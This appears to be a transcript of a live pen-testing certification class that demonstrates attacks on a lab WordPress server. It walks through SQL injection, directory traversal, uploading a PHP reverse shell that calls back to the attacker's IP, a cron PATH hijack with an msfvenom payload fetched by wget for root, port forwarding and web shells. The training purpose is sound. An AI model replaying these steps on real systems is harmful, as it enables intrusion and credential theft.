right? Go on to the hack toolbar, copy that Python command, upgrade your shell, upload more dangerous malware, build MSF Venom payload, upload that one, right? So again, you go and take advantage of starting a listener, get the reverse connection, try to perform all pivoting concepts. If there are multiple interfaces that are present, same story repeat. Are you able to link all the concepts that we all discussed so far? So the danger starts with one single entry point. So from here on, if someone asks you on what are the dangers that we can have with web application that is badly coded, show them these kind of vulnerabilities. And these are really, really possible in the real life scenario also. To demonstrate that, let's move on to the WordPress application now. This is command injection, right? So this is base for command injection. Next thing that you can see is local file inclusion on this application. Let us close this shell. Local file inclusion. So I can include files that are present on this particular server if this application is vulnerable for local file inclusion. As you can see, there is a page parameter here. So you can actually include any of the files. So it is bringing this file from some location. We don't know from which location it is bringing this, but you can do etc pass wd. See, file that is located on this computer, I'm able to include. Similar to this page is also vulnerable for remote file inclusion. What is remote file inclusion? I can actually add any page from any server, say https://www.google.com. We have Google page inside our actual application. How can these things be dangerous? Let's take a look on exploiting these applications, these vulnerabilities on WordPress. To do that, I'm using the same HSV box, which is already shared with all of you. Under WordPress directory, you can see WordPress application. In fact, there are so many vulnerabilities that are associated with this WordPress instance installed on this HSV box 1. You can do different types of attacks. So when I say WordPress, obviously the first thing that I always try looking at is admin panel. Brute forcing this admin login password and gaining access to the admin login can allow us to get a reverse connection. So to simplify this job, there is a too-good utility called WP scan. I think we already talked about WP scan in the last class, but now let's use this WP scan. I'm going to simply provide the URL with URL parameter. You can look at the help manual and see what are the syntaxes. What is the syntax to use this? 192.168.0.141/WordPress. I don't want to update this now. So scan is running, and in the meanwhile, you can see it also identified the web server software. Very good. We already did that. Apart from that, it is telling that there is readme.html file that is present. If it is present, you can also try checking for this one on RaceReva 2. Am I able to see this readme.html? Very good. I'm able to see this readme.html. This particular file will actually have the version detail here. Right, as they customized it, we are not able to see it, but this is a default page that actually recommends or tells all different information related to the WordPress instance that you are installing. So the PHP version that is compatible with this version of WordPress is 5.6.20, MySQL 5.0. Right, so the system requirements are these things, but recommended are these things. It means the target server may have any of these versions of PHP and MySQL. Hello, isn't it a sensitive piece of information? What you can do with this, that is a different story altogether. But there is a default page that was left. So this is the same thing that is present on this application also. Let's open both the pages side by side and see how they look. Why I thought of building these missions, because I want to show you on how the vulnerable missions are really related with the real life scenarios. So please don't consider vulnerable missions as something that is vulnerable and I can't consider that for practice. Hello. Are you observing that? This is the same exact thing that was left on the vulnerable mission and also on the live website. Right? Very good. Next, uploads directory is also present. So if I copy the content, luckily, Reva website doesn't have something called as directory listing enabled. As directory listing is not enabled, I may not able to see. If directory listing is enabled, this is how you can actually see the content. So you can get content. What are the contents that are uploaded onto the server? This is a default location for WordPress where it puts all the files that you upload. So you can see some cron related functionality enabled. Apart from that, WordPress version 5.0.8 theme that is enabled is 2019, right? And if you look at plugins, there is a plugin called as ebook download, site editor. That's it. There are 2 plugins that are enabled. All right. There are 2 plugins that are enabled. Fine. If I run the same exact scan on Race Reva, will I be able to do it or not? You must tell me. Think. Will this server allows me to do the scan using WP scan? Yes or no? Guess. How many of you say will get success? 1. If you feel like it is secure, you will not be able to run, then drop N. No. Or 2. Very good. This particular server is going to block me from running the scans. I think we already did that before, right? So the target is responding with 403 client side error. So there is a WAF that is strongly blocking this. But WP Scan has an option for you to customize the user agents to fool that server, saying that this request is coming from a different server and then perform the attack. Anyhow, ours is not a black hat. I'm sorry, red teaming operation. It is pen testing, right? So you must be very responsible while you are performing any kind of task like this. We found 2 different plugins that are installed and the version of the WordPress is 5.0.8 on this particular box, HSV box, right? Apart from that, there can be a bunch of other plugins also enabled, which may not be identified with this normal scan that we did. For this, for this WordPress or WP scan to identify those plugins, you must do aggressive scan. Please take down this command. The same exact WordPress scan, but this time I'm going to add plugin detection aggressive. Plugins detection aggressive. Yes, plugins detection aggressive. Let me highlight the command so that you all can note it down. It is plugins detection aggressive. Let's take advantage of exploiting those plugins that it identifies with aggressive detection. So it is still enumerating those plugins. right? In the meanwhile, let me show you how you can actually go through these plugins from this particular browser itself. Race-Reva is not vulnerable for local filing, directory listing. So if I go on wp-content, I will not be able to contents. I will not be able to see it because there will be an index page that will block me from not seeing this content. Inside themes, right? I can actually see what is running. If I know what is the exact theme, then I can actually specify the theme and then search for what is there inside it. Unfortunately, as directory listing is not there, we will not be able to do it here. Let me move on to this application and search for wp-content. Very good. You will not be able to see what is there inside. If I run themes, no. What if I search for plugins? I'm able to list the plugins. So while your scan is running in the background, this is the act that you can perform, right? Manually enumerating it. So let's see if I can view plugins. I will not be able to view that because again, there is index.html that is present, is index.php that is present, which will not allow you to see that plugins, but here I'm able to see. We are able to see only these two plugins when I am performing a normal passive WP scan, but there are two other plugins also. And those two things are detected with this one. WPSS, which is vulnerable for something called as directory listing. Sorry, directory listing is enabled, so it is able to look at the content. Say if I go on WP discuss, I'm not able to see the content inside WP discuss, but WP SS, I'm able to see the content, right? Site editor, again, I'm not able to see anything inside site editor. And for ebook download, I'm able to see this. So this is how the content will be organized in case of WordPress default installation, right? So WP scan reduced my efforts on automating all those activities. So you can see WP discuss. It is telling that this version is out of date and there is a newer version. So the version that it detected here is 7.0.4, which is for WP discuss. For WPSS, we don't know the version. The version could not be determined. But if I go on WPSS directory, obviously there will be readme.txt. In readme.txt, you can actually read and know what is the exact version. The version is 0.6. This is why directory listing is vulnerable. Right? So I'm able to take advantage of knowing what is the exact version. What is the next step? Can anyone guess? What must be the next step? I know that there are two plugins. One is WP Discuss 7.0.4. The other one is WPSS, which is running 6. What is the next step?
Knowing the vulnerability.
Very good. Knowing what is the exact vulnerability. What is the next? Apart from that, anyone else?
Checking command injections if it is possible.
Very good. We can check command injections. Next. Searching for the exact vulnerability on Google. So I'm asking Google WordPress WP discuss. What is the discuss plugin version and all? Let's copy paste. Version is 7.0.4. So WP discuss. Very good. 7. See, Google already know. Exploit DB exploit. Arbitrary file upload vulnerability. If you can upload the actual reverse shell there, you will be able to get a reverse connection from the target. Again, you must put efforts on reading this article and then understanding how to perform that attack, right? So reading this particular exploit code or knowing more about this vulnerability on the official websites, right, can give you more understanding. So yet another two good website is Packet Storm Security, from where you can get more details about different exploits and also exploit codes too, apart from exploit DB website. Very good. There is file upload vulnerability for this. What about WPSS? Copy. WPSS, WordPress plugin. Exploit version 0.6. There is SQL injection vulnerability. So exploit DB takes a lot of time loading. In the meanwhile, let's look for some other thing that is present. There is site editor plugin. Again, what is the version? Site editor version is 1.1.1, 80% confidence. Ebook download, there is directory listing enabled. So there is a possibility for us to download and search for a specific file. And ebook download is also running 1.1 version. Very good. We have all those exploits opened here. Let's do it for site editor. 1.1.1. See, Google know everything. Exploit DB, there is local file inclusion. Next, what is the other one? Ebook download. 1.1. There is directory traversal vulnerability. Right? Same exact common vulnerabilities that you already know. I think this pen test monkey is pen storm security is also taking time. It's okay, fine. Let's go with these 4 vulnerabilities that are associated with plugins and see what we can achieve. The first one is SQL injection vulnerability. If this application is vulnerable for SQL injection, there is a chance that we can gain access to the hashes or dumps, right, from the database. So if you read through this particular article that is mentioned by the authors who wrote this exploit, this is example proof of concept path. So on this WP contents location, for this particular file, there is a parameter, SS parameter, SS underscore ID parameter that is vulnerable for SQL injection, from where you can actually access username and password for any user. So let me copy this particular path and go on to this WordPress instance, paste it there. Hello, we got admin's password hash. You know John the Ripper? You know John the Ripper?
Yeah,
Crack
the
hash
hacking.
with John. It is that simple. If you can crack this hash and gain access to the admin panel, from there you can upload some malicious file and get reverse connection. I will show you all those things now. But this is one vulnerability that we identified through which I can get the admin hash. I'm going to leave this for you to crack. So we already showed you on how to use John the Ripper. So use John the Ripper to provide this hash for John and wordless to crack it. So that is one vulnerability. So where is that one? The spreadsheet thing down. Ebook, there is directory traversal vulnerability. By exploiting this directory traversal, you can download WP config file. See, going on to this path. This is proof of concept. I'm going to copy this. specify that path here. Immediately I'm able to download WP config file that is located on the WordPress installation directory. Opening that will show you the database credentials. Hello. What is difference between this database credential and this one? This one is actually the web login credential, WordPress login credential. This one is the actual database login. Anyhow, if you try checking for database port on the target machine. So if I do nmap -P3306 on 192.168.0.141, you will see that the port is closed. You will not be able to directly log into this particular machine. I'll show you other alternate now, but we have the database credentials with this directory listing vulnerability. This is how the common injection attacks that we learn can be applied in the real life scenarios if the concerned application that you have installed is actually vulnerable. Are you getting my point? So those are the two vulnerabilities. So one is the spreadsheet one, SS thing, and the other one is ebook download. Let's move on to local file inclusion and also the WP discuss, right? So let me exploit this WP discuss thing first, and then I'll come back to the local file inclusion. Okay. So if you want to take advantage of exploiting this, any of these plugins, you must first read about those plugins. What is the functionality of that plugin? This WP discuss plugin is actually a feedback form plugin. So if I take you onto this application, 192.168.0.206. Is it, sorry, 141, sorry. /WordPress. So this is a web application. If you scroll through the posts that are present and if you read some content, you will find this feedback form. This feedback form is actually the WP Discuss plugin. So on WordPress, it is completely modular. You can add whatever plugin that you want. You can remove whatever plugin from this if you want to, right? So this plugin is vulnerable for arbitrary file upload. The interesting thing is you can upload a reverse shell as an unauthenticated user onto this particular application to get a reverse shell or reverse connection. Process is very simple. Let me show you how it works. So let me first take you through the reverse shell codes that are already present. You don't need to write anything. There are some reverse shells that are already present on your Parrot or Kali. You can simply take advantage of those things to perform this particular activity. So those shells are present under user, share, web shells directory. And under that, we are looking for PHP codes, right? So it is PHP shell that you are looking for. These are all PHP web shells that you can use. Please note down the path. It is under user, share, web shells. So not only for PHP, you can get this web shell for different technologies. Say if the target is running on ASP, Windows IIS server, then you can go with ASP or ASPX. If it is a Perl based website, if it's JSP, then JSP. You can choose whatever one that you wish to. Now let's move on to PHP directory. Under this, there is a reverse shell.php. Let me copy this PHP reverse shell.php onto my Kali's desktop. And let me switch to my desktop. If I open this particular PHP code, this is how it looks like. Please note down, wherever you find file upload vulnerability, or wherever you find a way to inject some code, you can use all these kind of reverse shells. Right? So on this particular page, you will see options for IP address and port number. You need to simply change this IP address and port number to your attacker's IP address, where you want to receive reverse connection. Same as how I demonstrated that for command injection before. You can actually add that IP address and port number here and upload this as a file onto the target. Right? Of course, target is not going to accept this until and unless this is an image file. Because if you go through this web application have the WP discuss, but there is no option for you to upload a different type of file. You can only upload a image one. You can attach images only. Right? So you can take advantage of modifying this reverse shell by simply adding some headers to it to make it look like an image. So I'm doing two modifications to this file. One is our attacker's IP address, 192.168.0.206. Let us leave this to 1234 port number. That's okay, fine. Next modification that I'm going to do is, it is not PHP file. I must tell this particular server that this is a image file. So I'm going to write some image header telling that this is image file. Save this file. Close. Oops. We have those. We have that actual script. Let me move this to shell.php. If I cat the content of shell.php, you can re-verify whether your content is correct or not. It is an image file. And we have our attacker's IP address and the port number. So let's confirm whether this is the IP address of attacker or not. It is 206. What is next thing? Netcat listen verbose on port number 1234. We started listening. Let's test our luck. Image upload this one. Boom. Hello? You are www data. You got the reverse shell from HSB box. Isn't it interesting? This is purely because of one single vulnerability that is existing on the target device itself. So is that exploitation process clear? Can we move on to post exploitation now? If yes, please drop P in the chat. Very good. So the post exploitation thing that I wanted to show you all here is taking advantage of performing privilege escalation, right? So what kind of privilege escalation that we can do? We saw how to exploit kernels. So you can see uname -a. This is also a vulnerable kernel. You can exploit that. In the last scenario, we have seen SUID bit privilege escalation. You can try that one here. You can try sudo su and check what are the permissions that the users have. But I want to show you one of those interesting concepts of performing privilege escalation by simply modifying cron jobs. So cron jobs are really advantageous in case of any of the Linux missions. Task scheduling is common activity for system administrators. So checking what are the jobs that are scheduled on this mission. So cat etc cron tab will actually display all different cron jobs that are present. There are two different cron jobs that you can see here. One is a cron job that is executed by root user. He is going to execute a script that is present under this options directory known as unlock.sh. The other one is there is a start program that he is going to execute. In fact, you can modify any of these things to take advantage of a root account. Why and how? I'm able to use this for privilege escalation because these programs are actually executed by root user. In fact, this is a program that was doing some job there. We don't know what job it is actually doing. If there is a possibility for us to edit the actual content of the script or the program, then there is a possibility that we can perform privilege escalation, right? So let's look at the permissions of both the files and see if we have right permissions onto it or not. Oops, sorry. Do remember I am doing everything from the delicate shell that we accessed from the exploitation step of the web application. We don't have rights to edit this file. Only root user can read, write, and execute. So there is no possibility that you can edit this file. If you can edit this file, what you are going to do, can anyone tell me? Back onto this particular extension, there are PHP reverse shells, right? Copy one of these things, put that there and get reverse shell. Or you can go on TTYs, right? And use any of these TTYs to get a shell. So it is all your personal choice. But here, unfortunately, we don't have possibility of editing this file. So we are www data who cannot edit this file. But if you carefully look at this program start, we don't know where this program is present. So let's run find command and ask find to search for program named as start. At the main, start the search at the main root location, search for program that is named as start. Any errors that you see, push them onto dev null. So it must be a file. So type must be file. Push them onto dev null, black hole. So it identified program start in all different locations, but I think this one is looking quite promising. User local bin start. Okay, very good. If that is the case, if you carefully go through the paths that it is checking to execute this program, in fact, whenever root user is executing this program, he don't know where this particular program is. He will actually take advantage of this path variable that is declared for this cron jobs. So where is start, it will check in temp. If it is present inside temp, it will execute. If not, it will move on to user local sbin. If it is there, it will execute. If it is not there, it will move on to user local bin, execute. Hello, are you understanding? Okay, if that is the case, temp is the location that anyone can access. Temp is the location. You can also put some files there. Why can't we put a malicious MSF Venom payload inside this temp location, naming it as start? If we do so, root user for every minute will check for start program inside temp. If it is present, he is going to execute that. Hello? Are you understanding? Let me show you the actual attack now. For this process to work, I'm going to build MSF Venom payload. MSF Venom -p, right? This time let's take advantage of using Linux 64-bit shell, right? Reverse underscore TCP. So you can also use MetterBitter. It is again your choice. Whatever one that you want, you can use that. But please note that if you are using MetterBitter here, you must use multi-handler to handle that connection. Netcat will not be able to handle MetterBitter connections. Okay. So if you are specifying MetterBitter, use multi-handler that I've explained you in case of Office Word exploit, right? So there, someone must open Office Word document for us. But here, root user will execute it every minute, right? So task will be executed, but the only thing is you must put this file there. No exploits required. See, these are all kind of things that you must enumerate to find out and gain full control. In fact, you can also use the Linux smart enumeration script that I've showed you in the last class. You can go and run that script on the target and see what kind of vulnerabilities are present, right? Have we discussed that Linux smart enumeration script?
Yes, sir. Last time we explained that.
Yes, yes. You can actually use that one too here. So 192.168.0.206 L port is equal to, let's take 3535, right? And the file that I want to generate must be of ELF file. And finally, name this file as start and save that on desktop. You must be very careful at this point because the file must be of the same exact name. Start. So I'm going to save this on my desktop. Again, the same process, Python server, wget, download there. You must be able to use wget there, then only you will be able to upload it. So let's check if wget is present. Yes, wget is already there. So these are the tools that are commonly present on all the target missions. We have that start program, Python 3 -m http.server. Going on to the target, cd temp. I'm inside temp. Wget http://192.168.0.206 on port 8000. There is a file called as start. Download that.
Start name is wrong.
Okay. I misspelled it. I do these common mistakes a lot. Start. Very good. We have start program here. ls-l, you can see that it is not executable. So make it executable. So chmod +x is start. Now start is an executable there. How about opening a new prompt and starting a netcat listener on port 3535. And let's wait. Boom. Oh. Let's wait for the target to connect. If the root user executes that, we will be able to get the reverse connection. At first we got the connection and it is dying. Inverse lookup failed. We are not able to get the connection back. Okay, let's take advantage of building a meterpreter payload and then uploading it instead of this one, right? So let's remove start. Netcat shell, Netcat listener is not that stable all the time. Why can't we use our meterpreter? Right? And everything is fine. Put this file on my desktop. In the meanwhile, I'll try to remove that file named as start here. There is no program now. We are still there on temp. No such file or directory. I'm already there on desktop. Why am I doing the desktop as a path? In the meanwhile, not to waste time, let's start the listener also. MSF console -q. I hope you all are understanding. Yes or no? Are you all understanding, my dear friends? No response. Very good. Yes. So we are going to set the lhost value to the attacker's IP address, which is 206, and set lport value to 3535 and start the listener. Exploit -j. So it is time to transfer this payload. Very good. There we have meterpreter. So since -i1 sys4, we have Ubuntu mission, right? Get UID. Who are you? Root user. Why? Because this particular program is executed by the root user. There we have a root shell. Anyhow, if you are if you are not interested in using meterpreter, jump onto the shell. Got it? This is through a web application vulnerability. We started at the WP discuss, right? We uploaded it and then took a basic shell. And there we enumerated the mission, figured out the programs that are executed by root user on a specific scheduled time. And we tried modifying that particular file and we got access to the target as root user. Is it clear? Not only this, now you can check different programs that are running. So netstat -antp. Are you observing this MySQL port? MySQL daemon is actually running on loopback IP address, not on all interfaces. That is the reason why you are not seeing MySQL port open on the target. What is that you can perform? You can perform a remote port forwarding here, right? How to do remote port forwarding? If you already have MetaBitter shell, so we covered local port, SH local port forwarding, dynamic port forwarding. Remote port forwarding happens after you gain access to the target. So on the target, there is a service that is locally running on the target. You cannot access on your prompt. So in that situation, you can go and take advantage of remote port forwarding. Okay. So what I can actually specify, I can actually specify that port forwarding command on MetaBitter to do it. So port forwarding command can be utilized to do it. That is one aspect. But don't worry, we already have an advantage of credentials, SSH credentials on the target, right? I hope this practical is clear. I hope you all understood the entire process on gaining root access on that mission right from web application, right? So in CPENT exam, you will have challenges where you need to gain access to the root at times. And in few challenges, you no need to perform privilege escalation, right? So in few cases, you will not be able to do exploit the mission. So certain challenges will be asking you questions on what is the process that you have followed. They may ask you what is the mission name, what is the file that you can access, what is the actual flag that is placed on so and so location. These are things that they may ask you, right? So they may ask you the username. You may find some local file inclusion in a web application. Using that, you may find usernames. For example, this one, site editor plugin is vulnerable for local file inclusion, right? So you can take advantage of this proof of concept from where you can access etc passwd file. So let's directly hit this. I'm extremely sorry because of timing constraint. I'm not able to explain each and every practical in that detail, but I don't think that is necessary, right? So I'm going with one single practical on explaining you the detailed process, and that is the same exact thing that is applied for all other things also. You can see etc passwd file. So you are able to read this. In the exam, there is no possibility for you to get the reverse connection. Why? Because of egress bursting. There is a outbound rule that is written which will not allow you to get a reverse connection like this, what that we did before. Right? So try that particular reverse connection. If it is not working, then see how you can access the information that they are asking for. So in that scenario, they may ask you the username. So what is the username? You can see there is a user named as Harry, Mario, right? Muggle. These are the types of questions that they may ask you. You will be able to identify it only if you find out the local file inclusion vulnerability or something. How you will be able to know that? This is all the same random process. I mean, the same actual process that we have learned so far. Okay. Next thing that I want to show you on this particular mission. One last practical, I mean, two practicals, right? So I must cover that remote port forwarding. And after that, we'll wrap up this with one last practical, getting a shell, gaining access to the admin panel. All right. Oh, I can remove this shell. Now let's connect to the target mission, which is Muggle at 192.168.0.141. Okay, I need to knock to connect. I hope everyone who attended the previous sessions already know that Only after knocking these ports you will be able to see it. I also demonstrated on why and how it is configured, how to identify it. So we have shell on that machine. So before break, I actually have the thought of explaining you this concept there itself, but we actually stopped that here at this particular point. I think we gained the shell from the target and we stopped there. So if I run netstat with -a and tp, can see there is SSH port. So SSH service is running locally. Now I'm going to use remote port forwarding to forward this 3306 onto Kali Linux machine. So let me open a different tab or different window. And on this window, I want to start SSH service, because to do this reverse port forwarding, your attacker computer must also have SSH service. So service SSH start. Now my Kali Linux have this SSH port open. So anyone who want to connect, so if I see netstat -a and tp and grep for 22, you can see there is a listening port. Okay. Now let's take advantage of connecting to that particular Kali Linux machine, right? And giving access of this port 33062 to this Kali Linux machine. Local port forwarding and dynamic port forwarding will be done directly from the Kali Linux machine. But remote port forwarding is where you are going to forward the remote port onto Kali Linux local device, right? So you are going to execute that SSH command here. -r or -n space -r, right? And specify what is the local port that you want to forward. So in this case, it is MySQL. Onto which port of Kali Linux you want to forward, you must specify that port also, right? So on to 192.168.0.206, which is Kali Linux IP address. To Kali Linux machine, please forward this to port number 3737, or you can specify 33306 also. It is up to you on which port you want to get it. This local machine 127.0.0.1, which is running port 3306. This is what you must forward. This is similar to the local file inclusion, local port forwarding aspect. And now Kali @192.168.0.206. You must specify Kali's password. So that is attacker's mission's SSH service. So you can easily tell what is the password. So in case of local port forwarding, we are using Kali Linux and then forwarding some port that is open on some other device inside the internal network towards your computer. In case of remote port forwarding, the local port that is not normally accessible, right? You are forwarding that one towards the Kali Linux machine. Now the interesting step is, if I go on netstat and check 3737 on loopback IP address, you can access 3737. Can anyone tell me what is the service that is running there?
MySQL.
Very good. -p 3737. You can cross check with nmap. So nmap, please do version detection scan and tell me MySQL 5.5.62. You are not able to perform this directly on the target device, but now that port is on your computer, you can do it, right? So if I try doing this one directly on 3306, you know what happens. It is going to tell that the port is closed. So complexity increases if this particular machine is inside the local network, right? So you can see you are not able to see the port directly, but now you forwarded that port onto your machine, so you can access that. Now you can perform Hydra, database. Let's go with root. Let's guess that the password is simple. So I'm going to use E option, NSR. Anyhow, null password is also a possibility in case of SQL. So null password, same username as password, reverse of username as password, right? For SQL service that is running on 127.0.0.1 for port 3737. What happened? I think MySQL. So if we are able to find out the password, we can directly connect and start looking at the database. There you go. Now you can use MySQL hyphen. Okay, it is on local device. So you can go with hyphen H 127.0.0.1 hyphen U as root hyphen P as root. Root and root is the password. Not able to connect. Oh, you need to specify the port number here. So how to specify port number using MySQL? On MySQL command.
Numbers.
Pardon?
After the IP, you can give the colon and.
Okay. We can do that thing also. Is there any space? Yes, there is capital P option. So let's try both. You can specify 3737 root. Oh, this is not working. Then I think we must specify the port number with capital P. Boom. The port that is generally not accessible, closed, but still you are able to access this, but not directly, going through a different vulnerability that you exploited. This is how the bypassing techniques works. I hope the things are getting complex, and I hope today's session is there with a lot of advanced things, and that can be really intimidating. Yes or no?
Yes, sir. It is a bit complex, but still we have to.
But I hope you are understanding the process. Is that clear?
Yes.
So once you practice, then trust me, this is going to be very simple. So set up your own lab environment and do practice. Change the settings. See, if you have your own lab, that is the advantage. You can customize all these settings, right? Block it with firewall, unblock the firewall rules, see what is kind of response that you are getting. This is kind of research that you must do when you are part of this CPENT content preparation. Okay. Anyhow, iLabs are already there, but there is no possibility for you to control those missions there. So once you have all the things practiced on your end, you can easily go and do it on the iLabs or in the practice range. Let's wrap up this with one last practical. Apart from all different aspects or all different attacks that we did on the target WordPress application, you can also perform brute forcing the usernames and identifying the password for those users to gain access. To do this job, again, I'm going on WP scan. Let's see if my terminal remember that. Yes. So I'm using WP scan, going on to this IP address 192.168.0.141, and you can see -E is an option that can be used for enumeration. U is to enumerate usernames. So it is running under WordPress directory. So there are multiple users. Edmund, John, Alice, Bob. So let's take advantage of brute forcing root user's password. Anyhow, I've showed you that the plugin SQL injection vulnerability using which you can get the hash and then crack the hash to know the password. But if there is no possibility for you to see the plugins like that, then it will be difficult. Say, as in case of Race Reva, you're not able to know what are the plugins, but still there are plugins. This particular what we call slider can be a plugin. There is a callback functionality that can be a plugin. Are you seeing a chat engine here? This can be a plugin, a WordPress plugin or some other third-party plugin. There are some contact us forms, right? Those things can be plugins. We don't know what are the exact plugins, but if you are part of original actual pen test, you will be doing test on all these plugins and see how you can exploit it, right? And I'm gonna do password related brute force for admin user. So -u is an option to specify the username and -P is to specify the password list. So let me go with the password list that I actually prepared and used in the morning session. If this is not the choice, I mean, if you don't have the list provided in the exam or any other situation, you can go and use rocku.txt, right? Which is under user share wordless rocku.txt. So this is the file that you can use for all brute forcing activities. So we have this password now. Let's open that application. I think it is already open here. Yes, it is already there. wp-admin admin 123. We are in. If you allow people to see that login page, this is the danger. They can start doing brute forcing. Of course, if you have a firewall, it will block this brute forcing attempts. If you wrote that concerned rule to block this, if you have that specific rule to block brute forcing attempts in your firewall, then it is good. But if it is not there, this is how I can gain admin control. You can edit plugins, you can enable plugins, you can disable plugins. If I go on plugins section, you can see what are the plugins that are enabled. You can activate, deactivate, whatever you want. You can create your own malicious plugin, upload that here and get the shell, right? Or if I go on appearance and editor section, I will be able to see different pages. So there are a lot of PHP pages that are present. So there is a PHP page, right? I can take advantage of editing this PHP page and then gain access to the reverse shell. Let's do that. I'm going on to PHP 4.404.php page, right? For which theme? 2019. In fact, in 2019 theme, they actually updated it. You will not be able to modify these scripts here. But if it is 2017 or below that, you will be able to upload and modify the scripts. Let me show you what I'm talking about. If I try to remove this particular thing, can anyone guess on what is the script that I will be uploading here?
The reverse shell that we initially.
Very good. This is the one that we will be uploading. Removing the image part and copying this entire thing. Paste, update. No, you're not allowed. So you can only update this through a secure FTP connection that you have onto the server. Okay, no worries. You can go with 2017 theme because they left this thing on the target server. If you are not using this theme, you must remove all the files that are associated with that. If you're not removing, see what happens. I'm going on 404. Control A, delete. paste, update, updated successfully. Netcat -LVP on 1234. If I'm not wrong, that is the port that we mentioned here. Let's do check that once again. 1234. Now going on to WP content, that is the path where the file exists, right? So under WP content, themes, under themes 2017 theme, under 2017 there is 404.php. Boom, we have shell. This is how local file inclusion, file upload, remote file inclusion, SQL injection can be very dangerous, right? So you must know how you can take advantage of getting a shell. Now let us imagine that there is no possibility for you to get a reverse shell because of the egress bursting. What if there is a firewall rule that is written onto IP tables of the Linux machine where it is not going to allow you to go out from this server? Then don't worry. Don't worry. Why? Simply take advantage of uploading your own shell here. You can take advantage of mini shells that are present on internet. So one thing is B37 or something. I think it is B37. Yes, B374 mini shell. These are mini shells that you can upload there and access there itself. You will not get reverse connection, but you can enumerate that machine. You will have shell on that machine. So if I go on this PHP script, this is the script that I must upload. So take a raw copy of it, copy. It is as simple as copy pasting. It is encoded payload, copy. Let me choose archive.php and upload it here. If I can update this file, updated successfully. WP-content. Instead of 404, it is archive.php. You got the shell? So you can execute whatever commands. You want to execute MySQL commands, execute. Right? You want to execute shell commands. So pwd, you can see the path where you are right now. So cat /etc/passwd, you have that. If egress busting is a scenario where you are not able to get reverse connection, right? Then this is the one that you must do. Upload shell there and try to access the file there itself. They may ask you to grab a specific flag file that is placed under user location, right? You can access that directly from this kind of shell. Even if you don't have access to internet, if you have Kali Linux, in fact, in the exam, you can access whatever you want. There is no restriction. In the same exact directory, user share web shells PHP, there are other PHP shells. There are simple PHP backdoors that you can use. So let me take advantage of copying this shell and show you how that thing works. So I'm gonna use leaf pad to read the content and copy. Control A, copy. Back to that web page. Let me delete this. Then copied it. Whoa. Wait, quit. No. Control A, copy, paste, update. We are doing it on archive.php, so WP content. This is a basic shell that you already have. The same thing that B3K shell actually provided. So that is one thing from iLab's environment, but you can use it directly here also. So cat /etc/passwd, who am I, whatever command that you want to execute, it is all your choice. Is it clear, my dear friends? Have you enjoyed it? I know that this is kind of complex. That is the reason why I dedicated the complete session only for these complex concepts. So on day one, you thought like it is very simple. Am I right? But today is day 4, where we acquired all different things that are important for us while performing the pen test. With these demonstrations, I think you already got the clear picture on understanding the importance of the skill or the methodology that you are building. Tools are there which will support or help you in automating certain activities, but tool is not going to do everything. It is your methodology or the right thought at the right time that really helps you in gaining access or identifying right loopholes. Anyhow, I think I covered all different things by relating them with examples, which makes the process of understanding simple. But as you are new to these concepts, because tunneling and other concepts like getting shell or performing privilege escalation are not common in case of any ethical hacking concepts, right? So this is something that is extended version of what you already know from the ethical hacking point of view. So revise all the fundamentals, make sure that you know how to use the basic utilities, Wireshark, Nmap, Metasploit. So that too, I didn't use everything to the full extent. On day one, I told you Nmap, Wireshark, Metasploit. So that too, I didn't use to the full extent. Only the basic functionalities, I was able to do a lot of different things. So please make sure that you are strong at fundamentals. That is more than enough. More than that, you need to have that confidence in mind, right? So it is not going to happen overnight. Practice, practice, practice. Try to solve as many vulnerable missions as you can, right? Take advantage of exploiting the same exact vulnerability using multiple methods, right? Metasploitable 2, Metasploitable 3 are more than enough for you to practice. In fact, even in the CPENT exam environment, you will see similar kind of vulnerable applications, right? I'm telling you the secret. So don't worry. I observe that most of the candidates feel really bad about the skills that they have. Why they think so, I don't know, right? Even in the real life scenario, we'll use the same exact concepts, but we feel difficult or else we feel bad or we feel that we are lagging in something because we have not applied it anywhere so far. So try to take advantage of experimenting with your own lab setup to build that confidence first, right? Trust me, the tools that you already know are the ones that are utilized, right? Are the ones that your employer is going to ask questions on, but they mainly focus on understanding your methodology. No one will ask you what is XSS. They will throw an application at you and they will ask you to find out what kind of vulnerability is present there. So it is not going to happen overnight, but reading about it, right? Try to take advantage of picking one concept a day and put some efforts on doing your own research. Google is more than enough. You no need to refer tons of different materials or books or something else. try to figure out different ways that you can exploit that vulnerability. Understand the core vulnerability there and leave it. That's it. Whenever you come across the same, say as I mentioned, the command injection one, right? So whenever you see that kind of functionality, the shell shock vulnerability, whenever you see some kind of functionality that is associated with this kind of vulnerability, you can easily relate, right? So practice, for sure you will be able to build that confidence. It is damn simple. One of the interesting areas that you can actually work is pen testing. Only if you have the right fundamentals and the methodology correct. All right. With this thing said, we are almost there at the end point. My dear friends, because of the timing constraint, I think it is better I avoid the theory part. That is the reason why I'm skipping few theory slides here and there. Anyhow, most of the theory that you see in my slides, in fact, my slides are hardly of 4 to 5. That's it. I don't go more on theory because people already know theory. They can easily read theory from any material, right? So that is the same exact thing. Why I need to explain? I don't think there must be some kind of explanation for the theory part, right? But our actual motto is always to give you the right skill set to make you ready for the job. Trust me, only if you do that practical, only if you put your efforts on solving it on your own, you will be able to build it, right? So that is the reason why I mainly go with the practical aspects. So instead of going with the theory modules, in fact, there are no practicals for the cloud or else mobile cloud or else what is the other one? What are the other modules that we are left with? Is there anyone who have the syllabus copy? So the cloud and wireless pen testing that are actually part of the syllabus are not there with any kind of practical. So those are the same exact practicals that you did in CEH, right? So even in the iLabs, you'll not see any practicals for that. So those are really difficult to implement in an exam environment. That is the reason why even in the exam, you will not come across any kind of challenge related to cloud or wireless pen testing. Report writing, we already did that in the previous session itself, along with one of the solutions. Please make sure that you save the template and practice that. Even if you are planning to write CPENT practical exam or CPENT actual exam, you must prepare your own report, right? So the template that I've shared with you is a modified version of the template that I actually submitted for my certification exam. So please make sure that you practice that. So we are already done with that one, and we are left with few modules with very less amount of practicals over there. One is IoT, other one is OT SCADA. Finally, binary analysis. Binary analysis is a little bit trickier module as part of this course. So we will be covering all these three and the practicals that are associated with that on day 5 next Saturday. Along with that, I will also talk about few most important things that you must keep in mind while you are preparing for CPENT exam, right? So again, I'm telling this CPENT exam is really challenging, but not that hard. With a little bit of practice, you can easily crack this. All right. With that thing said, we are finally there at the end of day 4. I hope you all enjoyed all the 4 sessions. Can you tell me on which session is interesting? 1, 2, 3, or 4, or all the sessions? Which session you liked much? What are the concepts that actually found something new for you?
